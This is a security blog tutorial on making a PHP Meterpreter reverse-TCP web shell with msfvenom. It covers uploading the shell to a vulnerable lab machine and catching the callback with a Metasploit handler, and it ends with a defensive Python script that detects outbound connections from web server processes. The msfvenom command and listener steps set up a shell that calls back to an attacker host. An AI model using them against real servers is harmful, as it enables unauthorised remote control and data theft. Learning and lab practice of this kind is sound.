Reverse TCP shell with Metasploit

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019
Metasploit is an awesome tool. It can be used to automate the exploitation process, generate shellcode, act as a listener, and more. I hope to start a tutorial series on the Metasploit framework and its partner programs. In today's tutorial we are going to see how we can use Metasploit and msfvenom to create a web shell in PHP. It can create a reverse TCP connection to our machine. So let's start. First we use msfvenom to create our shell.
msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555
Here we have supplied several arguments to the msfvenom tool. Let's see what they do.

-p stands for payload. It tells msfvenom which payload we want to use. Here we used meterpreter as the payload. You can get the list of available payloads with the command msfvenom --list payloads. Since we want to make a shell for the web, we choose php.
-o is the output option. We have specified shell.php, so our output file will be saved as shell.php.
LHOST is the IP of the attacker machine. It should be our public IP.
LPORT is any open port on our machine.

[Image: msfvenom-shel-created]

You can see we have generated our shell as a PHP file. Now we can use any method like RFI, FUV etc. to upload this to a server. I'll use the Web for Pentester vulnerable machine.

Before we execute our shell we need to set up a listener to catch our connection. Now we start the Metasploit framework. There are a number of ways to use Metasploit, like msfcli, the msfweb interface, armitage, msfconsole etc. Most of the time we use msfconsole for this.

[Image: msfconsole-main-screen]

Yes, a beautiful interface. This is an interactive shell and we can use it easily. First we need to set a handler for our connection. The handler is responsible for handling the reverse connection. Here we have used multi/handler. You can select it with the use exploit command.

[Image: msf-exploit-selected]

Now we have to set some extra options. At any time in msfconsole you can find which options you need to set by entering the command show options.

[Image: msf-payload-set]

In the picture above we can see that we need to set LHOST and LPORT. Let's set them. Both of them are the same as what we used when generating our shell.

[Image: msf-lport-and-lhost]

OK, now is the time to attack. We use the command run to start the process.

[Image: msf-final-exploit]

It is waiting for an incoming connection. Now we can execute our shell on the web server.

[Image: msf-exploit-succes]

Yes, it worked. We got our meterpreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with the command help. :-)
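Seen from the web server, the reverse connection described above is an outbound TCP connection owned by the web server process, which is what a defender can look for. The following Python is an added example, not part of the original post: it parses `ss -tnp` output and flags established connections that a web server process opened itself. The sample lines, process names and the allow-listed database peer are constructed assumptions.

```python
import re

# Constructed sample of `ss -tnp` output on a web server (not captured from a real host).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:443 198.51.100.7:51234 users:(("apache2",pid=812,fd=12))
ESTAB 0 0 10.0.0.5:48212 203.0.113.9:555 users:(("apache2",pid=815,fd=14))
ESTAB 0 0 10.0.0.5:40110 10.0.0.20:3306 users:(("php-fpm",pid=901,fd=9))
ESTAB 0 0 10.0.0.5:22 198.51.100.7:50022 users:(("sshd",pid=640,fd=4))
LISTEN 0 511 0.0.0.0:443 0.0.0.0:* users:(("apache2",pid=800,fd=4))
"""

WEB_PROCESSES = {"apache2", "httpd", "nginx", "php-fpm"}  # assumed process names
SERVICE_PORTS = {80, 443}               # local ports on which the server accepts clients
ALLOWED_PEERS = {("10.0.0.20", 3306)}   # assumed: the site's own database server
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def split_endpoint(endpoint):
    # "10.0.0.5:443" or "[::1]:443" -> (host, port)
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)

def suspicious_outbound(ss_output):
    """Return connections a web server process initiated to a peer that is not allow-listed."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue  # header, LISTEN sockets, or lines without process info
        match = PROC_RE.search(fields[5])
        if not match or match.group(1) not in WEB_PROCESSES:
            continue
        _, local_port = split_endpoint(fields[3])
        peer = split_endpoint(fields[4])
        if local_port in SERVICE_PORTS or peer in ALLOWED_PEERS:
            continue  # inbound client traffic, or an expected backend connection
        findings.append({"process": match.group(1), "pid": int(match.group(2)), "peer": peer})
    return findings

if __name__ == "__main__":
    for finding in suspicious_outbound(SAMPLE_SS):
        print("outbound from web process:", finding)
```

Blocking outbound connections from the web server with an egress firewall rule, except to known backends, stops this kind of callback regardless of detection.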

Hi, I'm Thilan. An engineering student from Sri Lanka. I love to code with Python, JavaScript, PHP and C.